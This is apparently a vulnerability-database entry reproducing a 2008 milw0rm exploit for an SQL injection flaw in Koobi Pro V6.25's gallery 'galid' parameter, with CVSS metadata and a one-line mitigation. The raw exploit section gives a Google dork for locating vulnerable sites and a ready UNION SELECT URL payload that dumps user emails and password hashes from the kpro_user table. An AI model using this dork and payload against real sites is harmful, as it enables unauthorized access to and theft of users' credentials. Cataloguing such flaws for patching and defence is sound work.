Koobi Pro V6.25 gallery(galid)

vendor:

Koobi Pro

by:

S@BUN

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Koobi Pro

Affected Version From: V6.25

Affected Version To: V6.25

Patch Exists: NO

Related CWE: N/A

CPE: a:koobi:koobi_pro

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Koobi Pro V6.25 gallery(galid)

An attacker can exploit this vulnerability by sending a crafted HTTP request with malicious SQL statements to the vulnerable application. This can allow the attacker to gain access to sensitive information such as usernames and passwords stored in the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL statements.

Source

Exploit-DB raw data:

##########################################
#
# Koobi Pro V6.25 gallery(galid)
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####BLOG : http://my.opera.com/SQL-Injection/blog/
#
####MAiL : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORK 1 : allinurl: galid "index.php?p=gallerypic"
#
###########################################
EXPLOiT :

index.php?p=gallerypic&img_id=S@BUN&galid=-1+union+select+0,concat(email,0x3a,pass),2+from+kpro_user

###########################################
------------------S@BUN-------------------#
###########################################
-----hackturkiye.hackturkiye@gmail.com----#
###########################################
--http://my.opera.com/SQL-Injection/blog/-#
###########################################

# milw0rm.com [2008-04-08]